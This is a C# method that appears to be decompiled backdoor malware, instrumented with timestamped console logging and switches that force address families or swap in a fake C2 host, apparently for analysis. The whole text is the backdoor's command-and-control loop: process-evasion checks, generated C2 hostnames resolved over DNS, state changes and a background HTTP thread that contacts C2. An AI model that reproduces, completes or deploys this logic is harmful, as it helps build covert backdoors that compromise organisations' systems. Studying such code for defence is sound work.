private static void Update()
{
bool flag = false;
CryptoHelper cryptoHelper = new CryptoHelper(userId, domain4);
HttpHelper httpHelper = null;
Thread thread = null;
bool flag2 = true;
AddressFamilyEx addressFamilyEx = AddressFamilyEx.Unknown;
int num = 0;
bool flag3 = true;
DnsRecords dnsRecords = new DnsRecords();
Random random = new Random();
int a = 0;
if (!UpdateNotification())
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - UpdateNotification() failed.");
return;
}
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - UpdateNotification() complete.");
Settings.svcListModified2 = false;
int num2 = 1;
while (num2 <= 3 && !flag)
{
Utilities.DelayMin(dnsRecords.A, dnsRecords.A);
if (!ProcessTracker.TrackProcesses(true))
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - TrackProcesses() complete.");
if (Settings.svcListModified1)
{
flag3 = true;
}
num = (Settings.svcListModified2 ? (num + 1) : 0);
string hostName;
if (status == ReportStatus.New)
{
hostName = ((addressFamilyEx == AddressFamilyEx.Error) ? cryptoHelper.GetCurrentString() : cryptoHelper.GetPreviousString(out flag2));
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - hostName var set to: " + hostName);
}
else
{
if (status != ReportStatus.Append)
{
break;
}
hostName = (flag3 ? cryptoHelper.GetNextStringEx(dnsRecords.dnssec) : cryptoHelper.GetNextString(dnsRecords.dnssec));
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - hostName var set to: " + hostName);
}
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor is pulling the dnsRecords of C2: " + dnsRecords);
if (bypassn)
{
hostName = Settings.fakehost;
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Bypassing original C2 hostname and instead will be using " + hostName);
}
addressFamilyEx = DnsHelper.GetAddressFamily(hostName, dnsRecords);
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - AddressFamily is (-1 Netbios, -2 ImpLink, -3 Atm, -4 Ipx, -5 InterNetwork, -6 InterNetworkV6, -7 Unknown, -8 Error) : " + addressFamilyEx + " [-1-8 to force Family]");
if (forcea)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Netbios family");
addressFamilyEx = AddressFamilyEx.NetBios;
dnsRecords.cname = Settings.fakehost;
}
if (forceb)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing ImpLink family");
addressFamilyEx = AddressFamilyEx.ImpLink;
}
if (forcec)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Atm family");
addressFamilyEx = AddressFamilyEx.Atm;
}
if (forced)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Ipx family");
addressFamilyEx = AddressFamilyEx.Ipx;
}
if (forcee)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing InterNetwork family");
addressFamilyEx = AddressFamilyEx.InterNetwork;
}
if (forcef)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing InterNetworkV6 family");
addressFamilyEx = AddressFamilyEx.InterNetworkV6;
}
if (forceg)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Unknown family");
addressFamilyEx = AddressFamilyEx.Unknown;
}
if (forceh)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Error family");
addressFamilyEx = AddressFamilyEx.Error;
}
switch (addressFamilyEx)
{
case AddressFamilyEx.NetBios:
if (status == ReportStatus.Append)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor status is APPEND");
flag3 = false;
if (dnsRecords.dnssec)
{
a = dnsRecords.A;
dnsRecords.A = random.Next(1, 3);
}
}
if (status == ReportStatus.New && flag2)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor status is NEW");
status = ReportStatus.Append;
ConfigManager.WriteReportStatus(status);
}
if (!string.IsNullOrEmpty(dnsRecords.cname))
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - HTTPHELPER");
dnsRecords.A = a;
HttpHelper.Close(httpHelper, thread);
httpHelper = new HttpHelper(userId, dnsRecords);
if (!Settings.svcListModified2 || num > 1)
{
Settings.svcListModified2 = false;
thread = new Thread(new ThreadStart(httpHelper.Initialize))
{
IsBackground = true
};
thread.Start();
}
}
num2 = 0;
break;
case AddressFamilyEx.ImpLink:
case AddressFamilyEx.Atm:
ConfigManager.WriteReportStatus(ReportStatus.Truncate);
ProcessTracker.SetAutomaticMode();
flag = true;
break;
case AddressFamilyEx.Ipx:
if (status == ReportStatus.Append)
{
ConfigManager.WriteReportStatus(ReportStatus.New);
}
flag = true;
break;
case AddressFamilyEx.InterNetwork:
case AddressFamilyEx.InterNetworkV6:
case AddressFamilyEx.Unknown:
goto IL_1F7;
case AddressFamilyEx.Error:
dnsRecords.A = random.Next(420, 540);
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Random dnsRecord generated.");
break;
default:
goto IL_1F7;
}
IL_1F9:
num2++;
continue;
IL_1F7:
flag = true;
goto IL_1F9;
}
break;
}
HttpHelper.Close(httpHelper, thread);
}